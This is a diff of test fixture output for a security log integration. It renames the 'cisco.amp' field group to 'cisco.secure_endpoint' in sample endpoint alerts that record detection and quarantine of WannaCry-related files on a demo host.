                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1391,7 +1391,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1456,7 +1456,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510360004Z",
+                "ingested": "2021-09-27T00:41:33.420951151Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1466,7 +1466,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1531,7 +1531,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510361876Z",
+                "ingested": "2021-09-27T00:41:33.420952916Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1541,7 +1541,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1606,7 +1606,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510363767Z",
+                "ingested": "2021-09-27T00:41:33.420954673Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1616,7 +1616,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1681,7 +1681,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510365640Z",
+                "ingested": "2021-09-27T00:41:33.420956427Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1691,7 +1691,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1756,7 +1756,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510367543Z",
+                "ingested": "2021-09-27T00:41:33.420958165Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1766,7 +1766,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1831,7 +1831,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510369477Z",
+                "ingested": "2021-09-27T00:41:33.420960037Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1841,7 +1841,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1906,7 +1906,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510371353Z",
+                "ingested": "2021-09-27T00:41:33.420961785Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1916,7 +1916,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1981,7 +1981,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510373257Z",
+                "ingested": "2021-09-27T00:41:33.420963550Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1991,7 +1991,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2075,7 +2075,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510375122Z",
+                "ingested": "2021-09-27T00:41:33.420965302Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2086,7 +2086,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.2CA2D550E6-100.SBX.VIOC",
                     "computer": {
                         "active": true,
@@ -2171,7 +2171,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510376987Z",
+                "ingested": "2021-09-27T00:41:33.420967064Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2182,7 +2182,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.4A468603FD.04426d77.auto.Talos",
                     "computer": {
                         "active": true,
@@ -2271,7 +2271,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510378867Z",
+                "ingested": "2021-09-27T00:41:33.420968812Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2282,7 +2282,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Ransom:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -2371,7 +2371,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510380745Z",
+                "ingested": "2021-09-27T00:41:33.420970563Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -2382,7 +2382,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.Ransom:Gen.20gl.1201",
                     "computer": {
                         "active": true,
@@ -2448,7 +2448,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510382667Z",
+                "ingested": "2021-09-27T00:41:33.420972303Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2458,7 +2458,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2519,7 +2519,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510384507Z",
+                "ingested": "2021-09-27T00:41:33.420974035Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2529,7 +2529,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -2590,7 +2590,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510386359Z",
+                "ingested": "2021-09-27T00:41:33.420975788Z",
